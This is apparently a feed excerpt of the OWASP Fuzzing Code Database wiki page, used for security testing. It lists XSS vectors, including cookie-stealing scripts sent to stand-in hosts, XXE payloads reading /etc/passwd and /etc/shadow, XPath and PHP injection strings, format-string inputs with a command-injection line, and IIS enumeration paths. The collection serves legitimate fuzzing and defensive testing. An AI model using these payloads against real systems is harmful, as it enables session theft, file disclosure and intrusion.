&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81048</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81048"/>
				<updated>2010-04-06T21:31:23Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft IIS vulnerabilities and enumeration (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Microsoft IIS vulnerabilities and enumeration (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
